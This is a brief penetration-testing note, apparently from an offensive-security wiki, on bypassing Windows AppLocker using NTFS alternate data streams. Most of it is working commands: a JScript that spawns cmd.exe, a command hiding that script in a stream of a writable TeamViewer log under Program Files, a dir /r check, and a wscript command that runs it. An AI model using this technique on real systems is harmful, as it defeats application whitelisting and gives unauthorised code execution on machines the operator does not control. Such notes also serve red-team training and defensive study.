Alternate data streams

Test with test.js

var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");

if we can find a file in a trusted location that is both writable and executable, we could write the contents of this script to an alternate data stream inside that file and execute it, bypassing AppLocker.

type test.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

Confirm

dir /r "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log"

TeamViewer12_Logfile.log:test.js:$DATA

Execute

wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

Last updated 2 years ago